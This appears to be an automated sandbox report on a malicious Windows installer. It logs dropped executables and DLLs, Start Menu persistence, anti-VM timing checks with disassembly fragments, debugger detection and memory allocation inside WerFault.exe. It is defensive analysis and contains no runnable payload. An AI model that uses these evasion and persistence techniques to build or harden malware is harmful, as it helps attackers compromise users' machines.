                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3C2A.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\Updwork.exeJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\mfc80u.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\yljutqdulamJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\http_dll.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\dsxJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3C5A.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3C7A.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3BAC.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3C2A.tmpJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\yljutqdulamJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\dsxJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\RaftelibeGasrss\RaftelibeGasrss.lnkJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 6_2_00401550 StartServiceCtrlDispatcherW,6_2_00401550

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\YLJUTQDULAM
                      Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\DSX
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: Initial fileInitial file: ' Sleep for a brief period to ensure the install process has been launched WScript.Sleep 3000
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeAPI/Special instruction interceptor: Address: 6C345B2D
                      Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 6C343AF9
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeAPI/Special instruction interceptor: Address: 2ACD7E4
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeAPI/Special instruction interceptor: Address: 6AD23799
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeAPI/Special instruction interceptor: Address: 29CD7E4
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeRDTSC instruction interceptor: First address: 62EA32A0 second address: 62EB3821 instructions: 0x00000000 rdtsc 0x00000002 not al 0x00000004 mov eax, dword ptr [ebp-000000DCh] 0x0000000a push eax 0x0000000b lahf 0x0000000c bswap ax 0x0000000f jmp 00007F772CD0061Bh 0x00000014 mov ecx, dword ptr [ebp-000000E0h] 0x0000001a mov ax, 49EAh 0x0000001e push ecx 0x0000001f mov ah, FFFFFFA5h 0x00000022 movzx dx, al 0x00000026 cbw 0x00000028 push FFFFFFFFh 0x0000002a push FFFFFFFFh 0x0000002c movzx edx, bx 0x0000002f movzx ax, al 0x00000033 push 00000000h 0x00000035 cbw 0x00000037 push 00000005h 0x00000039 cwd 0x0000003b rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeRDTSC instruction interceptor: First address: 62EB4B3A second address: 62EAE213 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 movsx dx, bl 0x00000007 jmp 00007F772CCF95C7h 0x0000000c lea edx, dword ptr [ebp-24h] 0x0000000f mov ch, 00000005h 0x00000012 bswap ecx 0x00000014 cbw 0x00000016 push edx 0x00000017 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeRDTSC instruction interceptor: First address: 62EAE213 second address: 62EAE21F instructions: 0x00000000 rdtsc 0x00000002 setle ch 0x00000005 push 00000000h 0x00000007 push 590C0DF7h 0x0000000c rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeRDTSC instruction interceptor: First address: 62EB3433 second address: 62EB344A instructions: 0x00000000 rdtsc 0x00000002 cmovns eax, ebp 0x00000005 lea eax, dword ptr [ebp-40h] 0x00000008 push eax 0x00000009 movsx edx, ax 0x0000000c cbw 0x0000000e mov al, 27h 0x00000010 push 00000000h 0x00000012 push A4DA8725h 0x00000017 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeRDTSC instruction interceptor: First address: 62EA316D second address: 62EB9F3D instructions: 0x00000000 rdtsc 0x00000002 mov byte ptr [ebp-27h], FFFFFF88h 0x00000006 mov byte ptr [ebp-26h], 00000050h 0x0000000a movsx ecx, bx 0x0000000d mov byte ptr [ebp-25h], 00000048h 0x00000011 bswap cx 0x00000014 cmovl cx, di 0x00000018 mov byte ptr [ebp-24h], FFFFFF92h 0x0000001c cwde 0x0000001d mov byte ptr [ebp-23h], 00000077h 0x00000021 bswap dx 0x00000024 movzx cx, ah 0x00000028 cwd 0x0000002a mov byte ptr [ebp-22h], 00000011h 0x0000002e jmp 00007F772CD05D88h 0x00000033 mov byte ptr [ebp-21h], FFFFFFB8h 0x00000037 mov byte ptr [ebp-20h], 0000005Bh 0x0000003b xchg ch, dh 0x0000003d mov byte ptr [ebp-1Fh], FFFFFFDBh 0x00000041 not ch 0x00000043 mov byte ptr [ebp-1Eh], FFFFFF8Eh 0x00000047 jmp 00007F772CCDCA0Eh 0x0000004c mov byte ptr [ebp-1Dh], 00000009h 0x00000050 mov byte ptr [ebp-1Ch], 0000005Fh 0x00000054 cdq 0x00000055 movzx edx, sp 0x00000058 jmp 00007F772CD04858h 0x0000005d mov byte ptr [ebp-1Bh], FFFFFFABh 0x00000061 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeRDTSC instruction interceptor: First address: 62EB9F3D second address: 62EA6271 instructions: 0x00000000 rdtsc 0x00000002 mov dx, sp 0x00000005 mov byte ptr [ebp-1Ah], 0000007Ah 0x00000009 movsx eax, di 0x0000000c mov byte ptr [ebp-19h], FFFFFF94h 0x00000010 mov edx, esp 0x00000012 mov byte ptr [ebp-18h], 0000005Ch 0x00000016 cwd 0x00000018 cbw 0x0000001a mov byte ptr [ebp-17h], 0000000Ah 0x0000001e cwde 0x0000001f movsx edx, ax 0x00000022 not ecx 0x00000024 mov byte ptr [ebp-16h], 00000013h 0x00000028 mov byte ptr [ebp-15h], 0000004Ch 0x0000002c jmp 00007F772CCF02F4h 0x00000031 mov byte ptr [ebp-14h], FFFFFFB4h 0x00000035 mov byte ptr [ebp-13h], FFFFFFD6h 0x00000039 mov byte ptr [ebp-12h], 0000004Bh 0x0000003d movzx edx, ax 0x00000040 bswap cx 0x00000043 mov byte ptr [ebp-11h], FFFFFFF7h 0x00000047 seto dl 0x0000004a mov byte ptr [ebp-10h], FFFFFF83h 0x0000004e cwde 0x0000004f cwd 0x00000051 mov byte ptr [ebp-0Fh], 0000006Fh 0x00000055 setnbe dh 0x00000058 mov dh, 00000073h 0x0000005b mov byte ptr [ebp-0Eh], FFFFFFC9h 0x0000005f mov byte ptr [ebp-0Dh], FFFFFFF8h 0x00000063 jmp 00007F772CCFBDB1h 0x00000068 mov byte ptr [ebp-3Ch], 0000001Eh 0x0000006c mov byte ptr [ebp-3Bh], 0000006Dh 0x00000070 lahf 0x00000071 not ah 0x00000073 mov byte ptr [ebp-3Ah], FFFFFF82h 0x00000077 cwde 0x00000078 xchg dh, dh 0x0000007a mov byte ptr [ebp-39h], 00000043h 0x0000007e mov dh, FFFFFFECh 0x00000081 cmovb eax, esi 0x00000084 mov byte ptr [ebp-38h], 00000018h 0x00000088 mov byte ptr [ebp-37h], FFFFFFE7h 0x0000008c cwde 0x0000008d mov byte ptr [ebp-36h], FFFFFFEEh 0x00000091 movzx ecx, si 0x00000094 cdq 0x00000095 mov byte ptr [ebp-35h], 00000042h 0x00000099 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeRDTSC instruction interceptor: First address: 62EA6271 second address: 62EA6278 instructions: 0x00000000 rdtsc 0x00000002 lahf 0x00000003 mov byte ptr [ebp-34h], FFFFFFBCh 0x00000007 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeRDTSC instruction interceptor: First address: 62EB860E second address: 62EB862A instructions: 0x00000000 rdtsc 0x00000002 cbw 0x00000004 lea ecx, dword ptr [ebp-1Ch] 0x00000007 push ecx 0x00000008 movsx eax, ax 0x0000000b mov dh, FFFFFFA5h 0x0000000e cbw 0x00000010 push 00000001h 0x00000012 cbw 0x00000014 cwd 0x00000016 push 00000000h 0x00000018 cmovne dx, ax 0x0000001c rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeRDTSC instruction interceptor: First address: 62EBC64F second address: 62EBC656 instructions: 0x00000000 rdtsc 0x00000002 cdq 0x00000003 mov word ptr [ebp-06h], cx 0x00000007 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeRDTSC instruction interceptor: First address: 62EAAFE7 second address: 62EAA162 instructions: 0x00000000 rdtsc 0x00000002 cwde 0x00000003 lea ecx, dword ptr [ebp-28h] 0x00000006 push ecx 0x00000007 lea edx, dword ptr [ebp-00000158h] 0x0000000d jmp 00007F772CCFF06Dh 0x00000012 push edx 0x00000013 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeRDTSC instruction interceptor: First address: 62EB53BC second address: 62EB5958 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F772CCF7767h 0x00000007 mov ecx, dword ptr [ebp-24h] 0x0000000a push ecx 0x0000000b push 00000000h 0x0000000d jmp 00007F772CCE8FC8h 0x00000012 push 42E519A4h 0x00000017 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeRDTSC instruction interceptor: First address: 62EAC1A1 second address: 62EAC1B2 instructions: 0x00000000 rdtsc 0x00000002 movsx edx, bx 0x00000005 push FFFFFFFFh 0x00000007 push 00000000h 0x00000009 push 006FBC1Eh 0x0000000e movzx eax, ax 0x00000011 rdtsc
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeRDTSC instruction interceptor: First address: 62EA32A0 second address: 62EB3821 instructions: 0x00000000 rdtsc 0x00000002 not al 0x00000004 mov eax, dword ptr [ebp-000000DCh] 0x0000000a push eax 0x0000000b lahf 0x0000000c bswap ax 0x0000000f jmp 00007F772CD0061Bh 0x00000014 mov ecx, dword ptr [ebp-000000E0h] 0x0000001a mov ax, 49EAh 0x0000001e push ecx 0x0000001f mov ah, FFFFFFA5h 0x00000022 movzx dx, al 0x00000026 cbw 0x00000028 push FFFFFFFFh 0x0000002a push FFFFFFFFh 0x0000002c movzx edx, bx 0x0000002f movzx ax, al 0x00000033 push 00000000h 0x00000035 cbw 0x00000037 push 00000005h 0x00000039 cwd 0x0000003b rdtsc
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeRDTSC instruction interceptor: First address: 62EB4B3A second address: 62EAE213 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 movsx dx, bl 0x00000007 jmp 00007F772CCF95C7h 0x0000000c lea edx, dword ptr [ebp-24h] 0x0000000f mov ch, 00000005h 0x00000012 bswap ecx 0x00000014 cbw 0x00000016 push edx 0x00000017 rdtsc
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeRDTSC instruction interceptor: First address: 62EAE213 second address: 62EAE21F instructions: 0x00000000 rdtsc 0x00000002 setle ch 0x00000005 push 00000000h 0x00000007 push 590C0DF7h 0x0000000c rdtsc
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeRDTSC instruction interceptor: First address: 62EBC64F second address: 62EBC656 instructions: 0x00000000 rdtsc 0x00000002 cdq 0x00000003 mov word ptr [ebp-06h], cx 0x00000007 rdtsc
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeRDTSC instruction interceptor: First address: 62EAAFE7 second address: 62EAA162 instructions: 0x00000000 rdtsc 0x00000002 cwde 0x00000003 lea ecx, dword ptr [ebp-28h] 0x00000006 push ecx 0x00000007 lea edx, dword ptr [ebp-00000158h] 0x0000000d jmp 00007F772CCEF23Dh 0x00000012 push edx 0x00000013 rdtsc
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeRDTSC instruction interceptor: First address: 62EB53BC second address: 62EB5958 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F772CD07597h 0x00000007 mov ecx, dword ptr [ebp-24h] 0x0000000a push ecx 0x0000000b push 00000000h 0x0000000d jmp 00007F772CCF8DF8h 0x00000012 push 42E519A4h 0x00000017 rdtsc
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeRDTSC instruction interceptor: First address: 62EAC1A1 second address: 62EAC1B2 instructions: 0x00000000 rdtsc 0x00000002 movsx edx, bx 0x00000005 push FFFFFFFFh 0x00000007 push 00000000h 0x00000009 push 006FBC1Eh 0x0000000e movzx eax, ax 0x00000011 rdtsc
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeWindow / User API: threadDelayed 917Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeWindow / User API: threadDelayed 1523Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeWindow / User API: threadDelayed 1461Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeWindow / User API: threadDelayed 1080Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeWindow / User API: threadDelayed 1363Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeWindow / User API: threadDelayed 1414Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeWindow / User API: threadDelayed 1499Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeWindow / User API: threadDelayed 663Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI3C5A.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\msvcr80.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RaftelibeGarss\zlib1.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI3C7A.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI3C2A.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI3BAC.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mfc80u.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\yljutqdulamJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dsxJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_6-20100
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_6-20070
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeAPI coverage: 0.7 %
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeAPI coverage: 8.5 %
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeAPI coverage: 0.7 %
                      Source: C:\Windows\System32\msiexec.exe TID: 6960Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\WerFault.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\WerFault.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\WerFault.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\WerFault.exeThread sleep count: Count: 1080 delay: -6Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeThread sleep count: Count: 1363 delay: -5Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeThread sleep count: Count: 1414 delay: -4Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeThread sleep count: Count: 1499 delay: -3Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeCode function: 7_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,7_2_00405768
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeCode function: 7_2_004026FE FindFirstFileA,7_2_004026FE
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeCode function: 7_2_004062A3 FindFirstFileA,FindClose,7_2_004062A3
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                      Source: EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
                      Source: EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
                      Source: EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
                      Source: EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
                      Source: EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
                      Source: EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_6-19969
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 6_2_00401F94 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,6_2_00401F94
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 6_2_00401000 GetCommandLineW,GetCommandLineW,wcsstr,wcsstr,GetCommandLineW,wcsstr,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetCommandLineW,wcsstr,FreeLibrary,FreeLibrary,6_2_00401000
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 6_2_204046ED mov eax, dword ptr fs:[00000030h]6_2_204046ED
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 6_2_20402F80 mov eax, dword ptr fs:[00000030h]6_2_20402F80
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 6_2_20402F80 mov eax, dword ptr fs:[00000030h]6_2_20402F80
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeCode function: 7_2_62E86020 mov eax, dword ptr fs:[00000030h]7_2_62E86020
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 15_2_204046ED mov eax, dword ptr fs:[00000030h]15_2_204046ED
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 15_2_20402F80 mov eax, dword ptr fs:[00000030h]15_2_20402F80
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 15_2_20402F80 mov eax, dword ptr fs:[00000030h]15_2_20402F80
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe "C:\Users\user\AppData\Local\Temp\EHttpSrv.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 6_2_00402225 SetUnhandledExceptionFilter,6_2_00402225
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 6_2_00401F94 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,6_2_00401F94
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 6_2_20478952 _crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,6_2_20478952
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 15_2_00402225 SetUnhandledExceptionFilter,15_2_00402225
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 15_2_00401F94 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,15_2_00401F94
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 15_2_20478952 _crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,15_2_20478952

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeMemory allocated: C:\Windows\SysWOW64\WerFault.exe base: 24A0000 protect: page read and writeJump to behavior
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeMemory allocated: C:\Windows\SysWOW64\WerFault.exe base: 400000 protect: page read and writeJump to behavior
